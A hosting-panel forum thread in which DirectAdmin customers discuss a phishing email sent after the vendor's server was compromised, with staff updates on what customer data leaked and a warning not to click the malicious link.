"DirectAdmin Client Message" Email - Scam/Real?

Im not trying to nag you in anyway, but are the build servers safe? I can understand that some customers are worried sick that the last DirectAdmin update is compromised somehow. Can you provide MD5 sums in any way?

I second this, I'm quite concerned with the update I just installed...
 
They can't do anything with your LID and/or CID, because it's only working on your IP's.

the problem is, and the real question to ask is ...

if the know our LID and/or CID, and they hacked the DA release 4, they for sure are going to know also the ip addresses of all DA customer servers...

Is it possible?

If yes, guys, just one suggestion... take a look on email activities
 
got it too, have reported it to primus internet who are hosting that austinfosec site and advised them of the situation, hopefully they'll take down the infected site. Quite ironic that a online security company site has been hacked..
 
Dear Directadmin..

Could you please open another topic ... prefferably in 'Official DirectAdmin Announcements"

where you put in all official annoucements and let nobody reply on that topic?

also close all the different versions of this topic on the forum? its getting a bit confusing!

thanks!
 
Good question, especially if they also know the IP. But I am sure Directadmin will know how to manage this. So far they have been totally upfront and that gives me the tranquility that they are aware that the situation is critical and will look for the best solution.

In the mean time, let's not blow this out of proportion, since it's not in our interest to do so, as Directadmin panel providers.

Think about it.
 
I'll try and answer your questions as honestly and quickly as possible, but please understand we are busy fixing the server.

Lem0nHead: From what we can tell, the hacker(s) would know which IP matches the license ID#.

Starteck2002: As Wouter mentioned, nobody can do anything with your client/license ID#'s but we can certainly reissue licenses if that puts your mind at ease.

aleto: We have confirmed that the last build is untouched and there is no danger from someone pulling the latest update.tar.gz. There are no problems with installing/updating DA.

stardot: We are still looking into it so the only assurances we can offer right now is that billing information (Credit Card / PayPal) is not compromised in any way. The user database info we keep on this end is related to contact info and licensing information only. NOT BILLING.

Mark
 
I've got it as well. This is very strange and I have a bad feeling about how this information was obtained.
 
Good question, especially if they also know the IP. But I am sure Directadmin will know how to manage this. So far they have been totally upfront and that gives me the tranquility that they are aware that the situation is critical and will look for the best solution.

In the mean time, let's not blow this out of proportion, since it's not in our interest to do so, as Directadmin panel providers.

Think about it.

you couldnt be more right :)

we dont know what the reason is for the infection...

a few options

- unsafe software versions (in example php, apache, exim, ssh, etc)
- badly written scripts on the website
- inside job (ex employee who has certain passwords)
- password leak
etc etc etc

our DA servers might not have the same leak as DA.com has...

it looks like they hacked the DA server on purpose, specialist job .. not a script kiddo at work.

i'm pretty sure the DA guys are working HARD on finding the cause of this e-mail, lets sit back and wait for them to come back to us.

ow, and to clarify ... even if they have your UID LID and IP, they still cant download your server content.. they might be able (if i recall the DA security correctly, they cant) to dowload your license file which is really not a security leak.... the only problem with the IP might be that if they know which servers are running DA and the problem is the DA software, they might be able to hack-into all off these servers... but for now i dont believe all severs are compromised
 
As an sidenote (if this applies to you):

If you were using the password for your DA license account also on other sites / logins be sure to change them. (which is dumb anyway, but just pointing this out as an kind reminder)
 
I'll try and answer your questions as honestly and quickly as possible, but please understand we are busy fixing the server.

Lem0nHead: From what we can tell, the hacker(s) would know which IP matches the license ID#.

Starteck2002: As Wouter mentioned, nobody can do anything with your client/license ID#'s but we can certainly reissue licenses if that puts your mind at ease.

aleto: We have confirmed that the last build is untouched and there is no danger from someone pulling the latest update.tar.gz. There are no problems with installing/updating DA.

stardot: We are still looking into it so the only assurances we can offer right now is that billing information (Credit Card / PayPal) is not compromised in any way. The user database info we keep on this end is related to contact info and licensing information only. NOT BILLING.

Mark

Thanks mark.

Any information about passwords? What encryption were you using and was it salted?
 
Using Backfox as a proxy, it appears that the link has now been removed (the account "austinfosec.com.au" is reported as suspended).
 
Using Backfox as a proxy, it appears that the link has now been removed (the account "austinfosec.com.au" is reported as suspended).

He was also using another URL. If you do a whois.sc search on one of his domains and google his full name, you'll see all the domains being used for this.
 
Thanks!

@Mark

thanks for the update, keeping us up2date is quite keen in these conditions, we all know your working hard to find the root cause....

keep up the good work! :)
 
Thanks for your patience everyone. We are still investigating but don't want to leave you in the dark. Here's what we know so far:
Our server was compromised (not at the root level but serious enough nonetheless) and is being used to send those malicious e-mails to customers. We have disabled our mail server to interrupt this process.
Some customer information has been compromised: Name, e-mail address, mailing address, license ID#'s.
Billing information (e.g. Credit Card numbers, PayPal accounts, etc.) is absolutely safe. We use a restricted merchant gateway that doesn't allow us, even as owners, to view your full credit card information.
Finally, don't click that link. It's a malicious program but it can be cleaned with Trend Micro Housecall, MalwareByte's Anti-Malware, etc.
Will keep you updated..

Mark


Raises several questions:

-whether this wine hadn't written in php? ... ... whether wine server software?

If this is due to the ' holes ' server software in this case, at my very as clients?

Understand, as an administrator-you need to demonstrate knowledge and practice, but in this case: what is the meaning of installing the software, together with DirectAdmin in your compile code and configuration, since it is best to do the same this as shown in the current situation?

Please understand me, DirectAdmin is a fast and convenient way for small hosting companies ........ and so far - also safe.
- but when DirectAdmin is compromising what you may think yourself a regular user? ......... DirectAdmin and suddenly ceases to be convenient and fast tool because it forces you to do everything yourself what has so far not been necessary.
 
Back
Top